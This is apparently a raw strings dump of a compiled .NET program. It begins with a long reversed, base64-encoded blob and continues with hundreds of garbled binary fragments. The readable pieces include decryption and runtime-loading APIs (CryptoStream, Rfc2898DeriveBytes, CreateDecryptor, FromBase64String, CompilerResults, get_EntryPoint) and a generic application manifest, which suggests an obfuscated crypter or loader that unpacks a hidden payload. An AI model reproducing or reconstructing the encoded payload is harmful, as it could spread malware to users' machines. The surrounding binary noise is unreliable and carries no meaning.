mN1OTJRZ29BSTdJQ2RUUmxJZzBESVFKbGFnY21icEpIZHpwUUQ3bENLaGhVUWdRV2F2WkhJamxHYmlWSGM3SkVlU0J5Y3pGR2JqQnlZcHhtWTFCWENLMFFDSzBRZmdBQ0lnb1FEOUJDSWdBQ0lnQUNJSzBRZmdBQ0lnQUNJZ0FDSWdBQ0lLMGdDTnNISWdBQ0lnQUNJZ0FDSWdBaUNOZzJZMEYyWWdBQ0lnQUNJZ0FDSWdBQ0lLMFFmZ0FDSWdBQ0lnQUNJZ0FDSUswd09wZ0NkeUZHZFQ1aWNvUlhDSmtRQ0swd09wY0VkSWxWYUhSMWFvTmtaR1ZYWkZKSEtrRldaeWhHVnVjbWJwUldZbEpIYVU1U2JsUjNjNU5GSTNWbWJnMERJeWhHZGdRV1lsSkhhVTV5WnVsR1poVm1jb1JsTHRWR2R6bDNVSmtRQ0pvUURKa1FDSm9RRDdrU0twdzBjTkZXZW9VMlpoMVdTeVVHZDVKRUt3MW1RdDltY0dSbmNsWm5idk5FS0Zsa1ZJSkZlcEJTUGd3MGNORldlSmtRQ0pvUUQ3a1NLbE5tYzE5MmNsSjFjb0l6TTA1V1N2UmxMMEpYWjI1MmJENVNibFIzYzVORklzQURJc3cwY05GV2Vnd1NaakpYZHZOWFpTUkdLNUIzYkQ1Q2JoaDJjeUZXVHVNWFpqbG1keVYyVXc5bWNsUm5iSjVTWnRsR2R1Vm5VdTBXWjBOWGVUbFFDSmtnQ05zVFhsTm1jMTkyY2xKMWNiVkdkNUpHSTNWbWJnMERJTU5YVGhsWENKa1FDSzBRQ0prUUNLMHdPcFUyWXlWM2J6Vm1Vc2hTWmpKWGR2TlhaU3QyWXZ4RUk5QVNaakpYZHZOWFpTUkdJeVJIVTA1V1NKa1FDSm9RRDdrU1pqSlhkdk5YWlNaR0lza0NNb0lIZFFSbmJKQnlkbDVHS2xObWMxOTJjbEpGWmg5R1RnMERJbE5tYzE5MmNsSkZiZ0lIZFFSbmJKbFFDSmtnQ05zVEtsTm1jMTkyY2xKbFpnd1NLd2dpYzBCRmR1bEVJM1ZtYm9VMll5VjNielZtVW05V1o2bDJVZzBESWxObWMxOTJjbEoxY2dRbmJwVlhDSmtRQ0swd09wa3lNeWdpYzBCRmR1bEVJM1ZtYmd3U0s0RVRNb0lIZFFSbmJKQnlkbDVHSXNrQ01vSUhkUVJuYkpCeWRsNUdLbE5tYzE5MmNsSkZadWxtUmcwRElsTm1jMTkyY2xKbFpnSUhkUVJuYkpsUUNKa2dDTmtRQzdCQ0lnQUNJZ0FDSWdBQ0lnb1FENUpIZGdBQ0lnQUNJZ0FDSWdBQ0lLMHdlZ0FDSWdBQ0lnQWlDTmtDS3VsV1lOQkNacDltZGdNV2EwRkdkekJDSWdBQ0lnQUNJSzBRQ0pvUUQ5QkNJZ0FDSWdBQ0lLMFFmZ0FDSWdBQ0lnQUNJZ0FDSUswd09wMFdZbEpIZHpoQ2NoMUdkcEpFSTNWbWJnNG1jMVJYWnlCQ0lnQUNJZ0FDSWdBQ0lnQUNJZ0FpQ05zSElnQUNJZ0FDSWdBQ0lnQWlDTmtTS24xV2FvMFdZbEpIZFRsbmN2MVdaTkJ5ZGw1R0k5QVNiaFZtYzBOSEl5Rm1kb0F5WnVsMmMxQkNJZ0FDSWdBQ0lnQUNJZ29RRDdCQ0lnQUNJZ0FDSUswUUtuMVdhZzAxV2xSWGVpaFNabkZXYkpKVFowbG5RZ0FYWXRSWGFDQnlZcFJYWTBOSElqbEdiaVZIY0prZ0NOb1FESmtnQ05zVEtoUlhZRU5YWlNoR0l5UkhVMDVXU29VMll5VjNielZtVXJOMmJNQmljMEJGZHVsRUl1SlhaMGhYWmdNV2EwRkdkemxRQ0swUVhwSUNic1JtTHlNRGJsNW1jbHRtSW9RbmN2QlhiSnhHYkV0VkNKb1FESmtnQ05zVEt2Wm1iSk5YWlNoR0l5UkhVMDVXU2d3U1pzVkhadjFFYWdJSGRRUm5iSmhTWmpKWGR2TlhaU1JXWXZ4RUl5UkhVMDVXU2c0bWNsUkhlbEJ5WXBSWFkwTlhDSm9RRGRsU1oxSkhkOUkzYnlKWFIwTlhZTVJYWlRCQ0xpd0diazVpTXp3V1p1SlhackpDSzBKM2J3MVdTc3hHUmJsUUNLMFFDSm9RRDdreWJtNVdTelZtVW9CaWMwQkZkdWxFSXNVR2IxUjJiTmhHSXlSSFUwNVdTb1UyWXlWM2J6Vm1VbTlXWjZsMlVnUW5icFZISXVKWFowaFhaZ01XYTBGR2R6bFFDSzBRWHBVV2R5UlhQeTltY3lWRWR6RkdUMFYyVWd3aUlzeEdadUl6TXNWbWJ5VjJhaWdDZHk5R2N0bEVic1IwV0prZ0NOa1FDSzB3T3BVR2M1UkZjc0JpYzBCRmR1bEVJc1VXYmg1RWNzQmljMEJGZHVsRUlzVUdiMVIyYk5oR0l5UkhVMDVXU29VMll5VjNielZtVWs1V2FHQmljMEJGZHVsRUl1SlhaMGhYWmdNV2EwRkdkemxRQ0swUVhwSUNic1JtTHlNRGJsNW1jbHRtSW9RbmN2QlhiSnhHYkV0VkNKb1FESmtnQ04wWENKb1FEN2tTZmcwSEk3QlNYYmRtYnBKSGR6QnlkbDVHSTdCU1hiUjNZbHBtWXZCeWRsNUdJc3dHYjE1R0tsdDJiMjVXU3VRbmJwOUdVNUpIZHVWa0xwdzBjTkZXZW9RV1l2eGtMNXhtWXRWMmN6RlVDSmtnQ05zWENKb1FEcGd5UjBoVVdwZEVWcmgyUW1aVWRsVmtjZ1FXYXZaSElqbEdkaFIzY2dNV2FzSldkd2xRQ0swd09NTlhUaGxISWR0VlowbG5ZZ01XYTBGR2R6bFFDSzBRQ0pvUURKa2dDTjBISWdBQ0lnQUNJZ29RRDdZR0l1SlhkMFZtY2dBQ0lnQUNJZ0FDSWdBQ0lLMHdPcGdHZG41V1pNNWlaZ3dDTWd3aVpnd0NOZ3dpWm1Wbllva0hjdk4wYWo5R2JDNWljbFptWjFKRUlnQUNJZ0FDSWdBQ0lnQWlDTnNUWHVWR2JiVkdkNUpHSTNWbWJnMERJbUJTWGJWR2Q1SkdJZ0FDSWdBQ0lnQUNJZ0FpQ05zVEt3QUNMbVpXZGloaU16UW5iSjlHVnVJWFowSlhaMjUyYkRSWGFDQlNQZzRXWnNCQ2R1bEdJZ0FDSWdBQ0lnQUNJZ0FpQ05vUUQ5QkNJZ0FDSWdBQ0lnQUNJZ29RRDlCQ0lnQUNJZ0FDSWdBQ0lnQUNJZ0FpQ05zRE5nMHpLZ3NHSWdBQ0lnQUNJZ0FDSWdBQ0lnQUNJZ0FDSWdvUUQ3a0NOZ3d5YWd3aVptVm5ZZ3dDTWd3U0twZ2lZbkpYUXZSbExwa0hJc2dIS3NWR2VwQkZkbGRrTGloeWNsUlhlQ1JYWkg1aWNsUm5jbFpuYnZORWRwSkVLNUIzYkR0Mll2eG1RdUlYWm1aV2RDQkNJZ0FDSWdBQ0lnQUNJZ0FDSWdBQ0lnQUNJSzB3ZWdBQ0lnQUNJZ0FDSWdBQ0lnQUNJZ29RRHBzeUs1QnlPc0JDUGdrSEk3QURJOUFTZWdRbmJwaENJeTltWmdBQ0lnQUNJZ0FDSWdBQ0lnQUNJZ29RRDdCQ0lnQUNJZ0FDSWdBQ0lnb1FEcHN5SzRCeU9zQkNQZ2dISTdBREk5QUNlZ1FuYnBoQ0l5OW1aZ0FDSWdBQ0lnQUNJZ0FDSUswZ0NOc0RNZzBESXJCQ2R1bEdJZ0FDSWdBQ0lnQUNJZ0FpQ05zVFh1dFZaMGxuWWdjWFp1QlNQZ1ltWjFKR0lkdFZaMGxuWWdBQ0lnQUNJZ0FDSWdBQ0lLMHdPMEFpS2d3R0lxQUNiZzBESXVCQ2R1bEdJZ0FDSWdBQ0lnQUNJZ0FpQ05zRGEwUldhWDVpWWcwRElzQkNkdWxHSWdBQ0lnQUNJZ0FDSWdBaUNOc0hJZ0FDSWdBQ0lnb1FEcElHSXdGV2IwbG1RdWNtYnBkWFl5UmtMdFZHZHpsM1VvQVhiQzEyYnlaRWR5Vm1kdTkyUWcwMVdsUlhlaUJ5WXBSWFkwTkhJbFJYWTJsbWN3bFFDSzBRQ0pvUUQ5QkNJZ0FDSWdBQ0lLMHdPelZHZDVKR0l1SlhkMFZtY2dBQ0lnQUNJZ0FDSWdBQ0lLMFFmZ0FDSWdBQ0lnQUNJZ0FDSUswd09kWlRNZ1VDSXB0VmVoSm5jQlZHZDVKR0k5NEZJZGwyV3pWR2Q1SkdJZ0FDSWdBQ0lnQUNJZ0FDSWdBQ0lLMHdlZ0FDSWdBQ0lnQUNJZ0FDSUswUUtyc1NhZ3NEYTBkbWJseGtMelZHZDVKR0k4QVNhZ3NETWcwRElwQkNkdWxHS2dJM2JtQkNJZ0FDSWdBQ0lnQUNJZ29RRDdrQ1JJQkhiVUJuYTJsRVdEUm1jb01YWjBsblEwVjJSdVVHWnZOV2F1VmxMbjVXYWs5Mll1VkVJOUFTZWhKbmNCVkdkNUpHSWR0VlowbG5ZZ0FDSWdBQ0lnQUNJZ0FDSUswd2VnQUNJZ0FDSWdBaUNOa3ljbFJYZWlCU1hiVkdkNUpHS0Zsa1ZJSkZlcEJTWGJWR2Q1SkdJamxHZGhSM2NnVUdkaFpYYXlCSElnQUNJZ0FDSWdvUUQ3SXlJek5YWXdOaUlnMERJRWhFY3NSRmNxWlhTWU5FWnlCeVp1bG1jME5ISWpsR2RoUjNjZ0FDSWdBQ0lnQWlDTm9RRDdCQ0lnQWlDTjBXWXlkMmJ5QkZJek5YWXNOR0lnQUNJSzBnQ05BU2ZLMG5DTm9BSTdnek5nMERJMnBHWmdRbmJwVm5DZ3NET3hBRE8xQVNQZ3dVVnBCQ2R5OUdhelYzT3BBREswbEdlRjVDZHVWV2J1OW1jcFpuYkZCaUNnc3pNNEFDSTlBU1lDRkZJbFJYZWlwUUQ3bENLSVpIVmdRV2F2WkhJamxHYmlWSGM5cFFES0F5T3prak54VXpOeVVET3dZRE0yY3pNM2dESTlBU1psOUdJbjUyYnNwQUk3Y1RONGtESTlBeVJ2UkVJMDVXYTF0VEtOaGxlb1VtYnB4VVowbG1jWDVTWnM5MmN1OTJRZ29BSTdJQ1RIZGtJZzBESU5obGVnY21icEpIZHpwUUQ3bENLT0ZGYmdRV2F2WkhJamxHYmlWSGM5cFFES0F5TzFFak0wRURJOUFTUnNoRUkwSjNib05YZDdrQ0tsNVdhTVJXWWxKbExseDJiejUyYkRCaUNnc1RNd0VUTGdBU1Bnc2taUkJTWjBsbll6dFRLaU0wVG9KQ0t6VkdkNUpFYnNGRVpoVm1VdVVHYnBaa0xQbGtMdFZHZHpsM1VnMERJRDlFYUQ5RWFnMDFXbFJYZWlCaUNnc0RNeWd6TnkwQ0k5QXlRUGhHSTBKM2JvTm5DTnNYS29JbVNhQkNacDltZGdNV2FzSldkd3RIYVZsRUl6TlhZc05HSWpsR2JpVkhjZzBuQzlwUUQ3a0NXWUZFS2w1V2FNVkdkcEozVnVVR2J2Tm5idk5FSUtBeU9pYzBiQkpDSTlBQ1dZRkVJbjVXYXlSM2M3a2lJaHgwY2lneWNsUlhlQ3hHYkJSV1lsSmxMbHhXYUc1eVRKNVNibFIzYzVORkk5QVNZTU5YWU1OSElkdFZaMGxuWWdvQUk3UXpNNEFqTXRBU1BnRUdUekJDZHk5R2F6MW5DTnNETTVNRE4xQXlLZ1UxVHdCU1BnVTFUd3BRRDdsU00wTXpNMFl6TTNZREk5MERJVjlFY29VR2JwaDJkS0F5T3hRek16UWpOemNqTmcwRElWOUVjZ1FuYnBwUUQ3bENLUjlFVWdRV2F2WkhJamxHYmlWSGM5cFFES0F5T0dWek1yVWtOeEl6TTFVakwyMENJOUFpZEtsRUkwRjJic1pXZkswd09wMFZLeXdDTW9RSGVsNWtMekoxUXFKWFkzWkdhdUJGWmpaRVNiRlZkUmRrYWlWMFZ5ZGtheGRYWXlObGJScG1jQ1YzVFlabGVqaFNadWxHVGxSWGF5ZGxMbHgyYno1MmJEcFFEN2tDS3Q5R1p1Rm1VZ2NYWnVCU1B6SjFRcUpYWTNaR2F1QkZaalpFU2cwMmJrNVdZU3BRRDdBU2ZnVXpNd0VETmd3Q0l3UXpNeVVETTFBeWVnMERJUlZYVUhwbVlGZGxjSHBXYzNGbWNUNVdVcUpuUTE5RVdXcDNZZzAxVzA1V2FLMHdPaHAzUlRkMFUzcFhUQkprZEJoVVN0aFhjR05WWXpCM1ltbDNVQ0JTUGc4V2VXcFFEN2tDTXhBQ0x3QURNeGd5WnZ4a0xvUlhZTkJTUGdFbWVITjFSVGRuZU5Ga1EyRkVTSjFHZXhaMFVoTkhjalpXZVRKRUlseG1ZMTlHWkswd2VwWXpNdFVFT3lBek4wUWpMeUFTUDlBeWI1WkZLbHhXYW9kbkNnc0RPdzBTUnhNRE96WURNdUVESTlBeWI1WkZJbHhtWTE5R1o3a2lJNkZXVmlneWNsUlhlQ3hHYkJSV1lsSmxMbHhXYUc1eVRKNVNibFIzYzVORkk5QWllaFZsZWhWRklkdFZaMGxuWWdvQUk3TURPNU1ESTlBaWVoVkZJMEozYm9ObkNOc1hLb01tUWtCQ1pwOW1kZ01XYXNKV2R3MW5DTm9BSTdVRE14RVRNd2NUTndNRE55RVRNeVlUTWcwRElKNVdWZ2NtYnZ4bUNnc0RNM1VUTXdNVE56RWpNMVFETTVjRE54QVNQZ1EyWm5CeVp1OUdiOXBRRDdVRE4xa0ROM0FTUHJBQ1YwRm1DTnNYS3lnREk5MERJVVJYWW9VR2JwaDJkS0F5T3lnREk5QUNWMEZHSTA1V2FLMHdlcGdTYVdGR0lrbDJiMkJ5WXB4bVkxQjNlSGQzUmdNM2NoeDJZZ01XYXNKV2R3QlNmSzBuQ05vQUk3TWpNeWtESTlBeVF5MUdJMDVXYTF0VEtvVW1icHhFWmhWbVV1VUdidk5uYnZORUlLQXlPM0FDSTlBU2JZdEVJbFJYZWlObkNnc1RPd1F6TndZRE8wSVROMWdUTTNnak5nMERJbzFXYmdjbWJ2eG1DTnNYS29ZVlRLQkNacDltZGdNV2FzSldkdzFuQ05zVEt1ZGxab1VtYnB4VVowbG1jWDVTWnM5MmN1OTJRZ29BSTdJaVM1eG1JZzBESXVkbFpnY21icEpIZHpwQUk3Y2pOMkV6TWcwREl6RjFWZ1FuY3ZoMmMxMW5DTnNETXhjVE15SURJOUFpUnZabkNOc1hLMU16TXhBU1A5QWlSdlpIS2x4V2FvZG5DZ3NUTnpNVE1nMERJRzltZGdRbmJwcFFEN2xDSzBKVWRnUVdhdlpISWpsR2JpVkhjOXBRRDdrQ01vUVhhNFZrTDA1V1p0NTJieWxtZHVWRUlLQXlPd01UTWdBU1BnTUhSbkJTWjBsblk5cFFEN2NETTRnRE41QVNQckF5WW5CbkNOc1hLeGNETzNNRE9nMFRQZ00yWndoaVpwcEFJN1FUT2cwRElqZEdjZ1FuYnB0VEswaFVib1VtYnB4VVowbG1jWDVTWnM5MmN1OTJRZ29BSTdJU2FYeGtJZzBESTBoVWJnY21icEpIZHpwUUQ3bENLU2xIVWdRV2F2WkhJamxHYmlWSGM3UmtSVkJ5Y3pGR2JqQnlZcHhtWTFCWENLMHdlSzBnZHB0VWQ2bEhTWFJrWTJWSElsTldZd05YWnRGbWJLMGdDTnN6WnVsMmRoSkhSdTBXWjBOWGVUQnladWwyYzFwUUQ3TVhaamxtZHlWMlV3OW1jbFJuYko1U1p0bEdkdVZuVXUwV1owTlhlVEJ5WnVsMmMxcFFEN2NtYnBSV1lsSkhhVTVTYmxSM2M1TkZJbjVXYXpWbkNOc2pidmxHZGpWR2JtVm1VdTBXWjBOWGVUQnladWwyYzFwUUQ3UUhlbFJsTHRWR2R6bDNVZ2NtYnBOWGRLMHdPUGxrTHRWR2R6bDNVZ2NtYnBOWGRLMHdPdFZHZHpsM1VnY21icE5YZA==
+C11
z+ek
%S5d
aqY\
r6
~S
hH{!X
7z%v
YgJ3
ld&6
T2C]
ed6v3lah
IN@7|
"<0V
>|WHC-
-+M4
ve54+
/{a:2
y`33%
Substring
GPGqO
l6@5
s1QK
&*N(
)
zV
'M@C
3`*h]
s#-'
TmR2
GZtO
vE z
|D_!J
C;[*
":B#m
F>
+L#
"ZZD
.$^"
$	0C$n
a
kQ
`xM
UV1L
2&*n
*2o*
Ujr8
CryptoStream
j*)<jN
Spul
T`(,.
oxph3vo7
C0.M
3*1i8
5oh+
ReadAllBytes
smethod_0
smethod_1
smethod_2
#+L)
L{`$0
PKe>[O
8
L#m
_q65ZV
N\nX
%B4g
lA}t:5c3
WU~
Eer$
J2UY>
H`y=C;
Int32
%OAE
><Wkf
ht<\
R0p3
Nx<b&S
LOGFONT
?8i
5_#W
ZZOx
8#K4
H'9j
'Td|
I3Bhc3Mj
uIMDi*5
k1
]
odcytlz1
+B$h
yD;%V
\3/$
o0R?
CZ<K3
\/'ip
QYq\
Ib,<'d
=!\t8
mS`)
c+DL'
rO
~,@
TA7;
Fd-jP
kU'T
RuntimeFieldHandle
itBe
%C$>
,B:k
]Pc(
LET\'
b~i?
-nw[`
3h8e
yU&5<
nA
\
a*RrC0
)LUK
ACwA
t4vM
p<d@
uSh<)w=
Nl+^
hkz%
A|8
b~b)+
"zBt
dgf?
/0
x=5FD
DrGTU]I
!z4+8_
DCkBM
1<]@K`
ttD:
,2fv'
XQ2Vs
kn
g
4]!$
f[S1
]#
VH#y
cnS]
<mIO
Rh$0
`b3\]
5yr%<
Snapshot
%j~fO
33Ec
e<w6
aIV'
yC~
x_J)
=-ekY
~D<s
\@]A
^n5r
2g
gjL^
;=!a
]#U0
pc\'
8+6T
9,_n{
zW]%~>
X%Tf3
crXi
jZTp
{h\k
[h
-.5
UFM`s
F$IF
U:p}
sg%\
*2B'
Z7pd
f}$sv;}
E>96
LC8Vs
oi~|
RD[Su,
M`ox
Pkv2
>5jO&+
OF,T
=[wr
:/9v
Go3`}
t6N(s
4\:D>
X)es
REhs
+`y,
Format
rvSTJ
].u7
eK0;
T(H(
1:8?
a|xX
/PcDZDEE
:e,V
6ooj
NG"zC
EcXm
J%~~N
}.G]A[h
wTnq
X|=[]
88hH
bWa$
R;Ed
zW]]
X%V?
at3o
-B%>N
AppDomain
,.>
&qF^
zE
B6\@,
+^pG^byH$D
GkD7:
K$Yb
{	^<
kshq
@44 7
6Z*
get_CurrentDomain
System.Security.Cryptography
b`"0
X7Mr
d7-
@^ d]c
01g%
EEc8F
ZQO>
545k
kPDT
wuDT5(
p[mX
SX t
{5	1
N4j/
Bw}r
%|p`
xoahtn4j
wxI_
a?r4
+Dn!
s:6zw
3e86
7iN
"iS0
(D#@'
^q#oN
g.;b
FromBase64String
qDIi';s8v?S'6
.pe~
L6%MD
IXm6
gmf.
kFt4
>uOy
dB"Vi
asdF
Ot`o
3he
n4AQJ
BgsE
v~DEVst?j
pa!3Y
tL!C
y#>
*@7~6
25h>
Ibxl
*Z/1
Tz
$
b=(P
Os"m
;zk:[
[M&k6
ZCf.Wp
zDYP
MemberFilter
_gL?@
IDATi
Cw&HX6
z-M|@
sx>A
'O$@5{=
0Fl~r)M
cAj4v
#
F'
4sE<
#Blob
nc)TC
m:4T*
yph2e9j3
g68<l
;&My
v#unF
,vC'd
98_\
5WcX
Dv8)
0w J
gu9,fj
e#]	U
=XU%
+iS
A
EK&CM
LD<P
(D>WtPV
XqE>v}%
bs5Bety8sIwflhbM.not
]Adp
PhH
e_:s
X/_0
iXj|K
ncp+
#6H+
Lw#;
e\1+
L:K
BranchAssemblyInfoInternal
J_$n
Jt>4
S]^y
Bq;
QO~yX
f3bs:v
4b
QiH
lk/j
[?bN
$\{6
6L9)
r}#]*
}
|CCo@
System.Text
mnSz:
iT;
ni`U
G[%i
g1eXJy
>eMp
uC8F
L]8F
WXLC{
=5{f&
f/%tYw
O!N[A
XC@)
0a$8.b
g003hl14
<q6,B
W4tH$
KXDQ
6P$v
BPu!u9
vDkQ
xF,z
"6
MQ==
87l6
<(D]
c]2<M
i_XBt
TA3z
pdlfV+
lx 
R
cuxT
ZCk^DE
I"WN
.Q
(9=<
s/
EGdf
@:gV
H	LI8F4
get_Name
i`yy
' 6G
Zr~
w^_X
-gT
'q7
#+=n
vbDU
3^y1E
BV-We
+f7
m$J6
HwQ
W&Ylb
?41P
*R
hH"*
Oxc?i
~B
L7A
*
.iglQ
J\y2Y
9\G$s
^>u:
C9O}S
qi.D
m.98
PeK$
yZ[a
jp<8
[$y#4
%yFfF 8+
=GL?%
[`O]o
*sOweT
n"2-
r6SVe
u?W3
N 0
t3i|
#@"A
BLgy
fl4W
*OPiTA
HrH
c:94`
4R)P
tD1i
m]Mm
g"T4q
~'5@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
!cZ"
oRP
gSSL
j3aubi1z
w`[gv w>Q^
q+rx
N
a&8
&f8
-BGf
}kR+
^| ~+[
:"Rb
V<qOp.
NS	_)
WHd$
d8VRH
e1 :j=KsnW
DialogResult
o+
d3FD
t=(1'
M(":
wFj(s
qqn`:
F4ITr
){]mr
!yP^S
4trF
(1>1
.text
/2!+
XB
.Ih|
<"D3
$8|"
eVU]
w3
no
:Q
Bx$,
=F	D
aEv-{=
Sv4lD
'tGVB<
^ULC
on2l795j
>MAo6
jcL)
|=nw
D/=G
U
L=
m zh
Convert
5Yl5
lZyk
o{UoT
W32\M
qorv8g7w
*8W
h[/f
DcWbS
jMAZ
+iA5F
5:#h{
m*vXA
Fohy
-APJ@
4	q:`_
/89DC
{DA
=I$8
komu)
H6DC
#RKx5
<jj:H
rA7f
Yk5$j
,L[;
C}^z
JwxNi
X/T}B
i?46
Tni'
5RiT
>*@W
G.c2KD1
)Q5l
V6&?Mk
4{9;jo
zH8W
KE'qzu
8iAwF
qD_[
Z;
6-L1
BvET94
jd<3
/4Hcrod
5CMk6g
P?..T
)2~Knf
t,>gd
Hi%W
LB(S
_pHB
LA<ga(:)
get_ASCII
X>'x
#.b'-2
a]jB
iKyE
Y"z-q
Yxt|
`'WC
}Ug{Cc"
=k?8
_	k5V6l
L*+0
tZ^,
SlWs
.L36
D[AXk
<gn8j
|y~vV
Jx-<
-Q!
A~~
?bDs
R,2[
\2_/
j~,R
$X{[`
A^ZN,r
NDCm
o>KA
B>T3
`lan2
l+T0
qnW%
CreateDecryptor
ZI-)
(L@t#
L0<kC
yb>#
>BA5
\c+%
Dog`
f%#ifN
6( -
S5n':
=gj!]
2BS^
JN
h2&6:<
S4kO
ieEL
|SpPx
4]\)
S1,<
Q
eh
ghc,s
&*r~
,a~>
I,"ztj
rEH{
d<vc
Yt?l
)4&
.
sC[+V
*^cS
iVc W
iiz8v4w2
&K.%A
syD!_
f7;f
BCj`?$
*9m
p'ya]
:/.K
.Ru
hDK)3
owR{
Uqk
(C(m
f5/!
4Zq}
oB[7
X:
f48.
L2!0X
3cFs
]X	w{
LBC.B5
A4Tr
&KSM
\f:o'
Ho}(
3j%1m
r	\E|L}
LDcb
R!H
$	%<
9Jb^<
i:|
dm?@
5GYMFZ%
"{Bn
oRe[
sHHa
]_cO
dG \
=~kh
"5dy
_ASQw
FA.@
aDyhTT
7q'?vwM
)
z9
X||c
BW8[,I
Z&Vp
j2:O
s,"'
(nn.
A41`
/ARz
Xp|N
Ym>$[
StringCollection
<fo/
?7SVw
ht_05|>
zz%-z\m
705(
_h}L
N+8F
qUGO
RIV}
LMBpr&(
;
Kl	5
2L7S
v9
?
sa>8
=86u
XA;cGn
(0Vm
EGyu;,t/
Ip'3
Qr!*
RPSl
huB'
Z	b_U
\1G6
{:>
"{4}
5`:K'
]"^_
!=v[
GetBytes
z=d2FmY@CD
IT\r
I^^
jOh7
whKdt
H<	+`
+ajp
(U*h
ed^D
|CiP
*f~v
(Gfg
'ueux
)TkVc*J\-
jq]"
Cp=|H
eB<L
#LKED
TM'$
l32|
r_h^
0n328
j)G?o
`t`j5
oWh!
Write
Hy,q
)AQm
l/C
g#vD
ApmE
Z9Ub#
G	pt
m}{G
GDt5
wp$0
fqS7
6i(3u
f#u#}
w
w9T
bqC8
6~KD
]OMz
o#wb
OQ/K
{*v%B
ODb7
o|Dx
6D?X
h	lcH
EDCW
-A{=
b#g8
]y.kJ-]j
e]v?^
&	o
<?0P%
)<}6
>'<2
ue+G
EH9"
uLJR
H])	sP
vWkI
5FCV}
VQzHR
qhR}a
TuD$
-SCX%
|x~c&
Q
G/L.@
#.60
M'sf
l^y
|a3K
NF%e-:(n
System.IO
_"q
WrapNonExceptionThrows
Hx!w
8~h|2
EDwp
3y0c
:zG
<Z7H
jx^\
&gPc
DtiR
h6cDX
gq>Q
W	F
Console
i&6~
E"d'
]TT|l
QREg
<8F$s
0()S
^,-
sDmS+
"ZrJ
lwc7
P;xo
1"?,ty
2yL"
INM9`
?
&7jp)
ED92
8o'
T-
gj*M
zDE;
BbW(
pT3I
OC'1
bWc`
)7\j5
(`.]J
}
'M
OotM
-zJ
Rfc2898DeriveBytes
kv]\=
XohR
X
ye
!?8M?o
<k+'rK;
ph&
$[U#
`)f!J
U Rz
mc=w
IHDR
qAj
op_Equality
kJ	!
}q
i
H-oD
#ZRG
b`]
e|Wk
lL	dg
.JJx
^\t
2O4$2
=P#ajb
{Oq*V
#Bpa
P|zi
(2(8F%H
(g5Q
Hjcq
9{O\
\)Hi8
zTk
$or4
( -#
Lf
sJ
$4A
System
>f7SmdN
gi-<
Vn$2
Microsoft.CSharp
4Xt4
IQy(
-T(-
U-,Q
~^	v
}S`@
9$28
D!Yy8.
Ln*<
0Eys
*~P-#
7Zws+
>J ^
Fz;!
~^	E
EE6
#%t'r
MKh
([)K7Z
cq9!
K+WV
on4rgxcx
AV~=
k@Z}M0
SN&q
F?K'
bmB,
QCS
1DoQM
z/T]
36=	F
~e&<
JV2
&1
D"~S
#J*B
TA(
BkAlA$
]UAD
~wClS
EGvw
zAsf
'7\T/
5AnDEk8
BIbUyh
MethodBase
#Strings
x@S.(H
HL5Dz
EZj_
W5|f
ndD?
d\Y<(
{+a
kTc:b
Fya(2
VD]
h;{A
$vpK
/7&*
DDA8
dZXR
^Unt
8l
*E
L-44
3e.t~
&45q
ladnm
sVAk
W8Va
c/|
?
kkcshlno
']Gbu
Yunh
W%*
FsE#
mpvRXSi=
tt!X
hS{C_
w|U@
<jBXp
-tH0X
4YL/
+hZC
#Z1z
.g7?`
8FT*D\"'
ujr6v9r2
>C?D
q87
v:}+
K/3:N
RT_3?
-.5Z
4-S2
2q/0
get_EntryPoint
+gpV5
NF0Y
`5%x%
EY<
Cw5T
1eUAmB
QO<
hu@z_	S
sPXyb
WcD+
CQ3%
aDO8
-ruB?
?|W
+8
rEo*o1b
kA"?cb
?40
Ay
N??f
]Et!
xkfw0312
System.Diagnostics
GetEnvironmentVariable
-b]3LC
%=VV
U3lzdGVtLmRsbA==
QCV#f6
s'<f
z'=X
{BkhJ
FD;Y
fDM>
U?}0D
3kEPOid
hDZq
Se,-
WB<}
c||
xT .
t5
I
y#
ROU2
*C#
S4
u4gf
,9C
fs'|
lA#2p
">#^
*)
@
q0rO
[fdO
{P(
Lz]r
-fRv18
ES0M
zHs:
'8[;@
D&e;
HD
fu`0
R
|B:
D*aJ/
`wiiZe
X[Gh-
!cWXd
H~c>
a
!?
#=`*
{h(2
uD988
f`jn
0I8]
ct%1q
_~]W'
_8R4
f/P(
G4
D
fDD}h
#xP{|
NqZv
<D)p-
CompilerResults
}^.&
cMk
D,$r
?N|
!'8y
[r$0
]=O0
8HDTRD
OH[v
1"g7
oUk?w
k2o"w
pC1DqZ
o`WW
;O^
get_BaseStream
YIXc
"?G^
fJ;b
2KzSb
>1TO7
'2.0
`,4(J
]m4b-|
@;'O
,3]
vEjT
5#Nr
get_UTF8
=7='
g^(j
=L|u
*y10
-lE
}	1D7
?@4#
3mZ
g'?:
ojla]^
'&B]
6q~8
Y#m
:G`b2
DcY+`
|
gP	G
R>x[]0
6J0(
>s<4s
Z3/4
Kh?DQ.$F6
NLKS
qA]x
fo	!
NGHvT
liAW
Vc
)DCI
^i+`+
qA]
DE9
bbZ(
@.reloc
-\{<T
:$e)
T</d,A!g_
8\`l
+I6gDTX7he
I~wpH
yintcyhl
\'ks
AZ7K
Ps@b
"9cX
_pj%
2)G"I
uE@
|8c?
'QX
Ddr
D1Zq
1(S
1:=-
W!7~u
5G,)Ti
xpiOSpOW<
]C8
cTyE
n`Cw
S
dj
t
z-
pOYA
WcEj
KCTS
tBF4
lQiH
-P{q
!'dS
rxh(
fWsD
>I^V
y&`F
=%k
43KLDs
7z"
&]\i
b(x
c/oP
7oPd
V4&-
J9Yq
[R6|^y
@KrV
s9io|
3!kz
2
to:_
ptu;
Math
9J)i~,
@spM^
%jy\
zBvi
.
Xb7a
!G`]
|2K0
P3_l
)(OcM
"\3;`o
fOB?"
Gx8`*
%LE"
>iVF
7B%Kg
=(y
9][v
f
yoymiC,
=U#A4
wyZI
kg}
b]
B4s
|O/Q
qOzFC
v[Y4
=?
7o
h
Z!
kW{C
'sD	v
(dE
OmI`>
EJC	s
3e*
&J:F
;~pf
'@E}
o:2)/x
Q\]}H
xh-=
CUU
;y4FC
CU*?
{\nT
d%kmjuia
IxYC9
&F\UeO
A929
R0X5
ck2jew6u
a]O,
M`JYQ
|whJj
or+9"
![SN`
j?"
!Y[A
}C83
jxxf
\3D}P
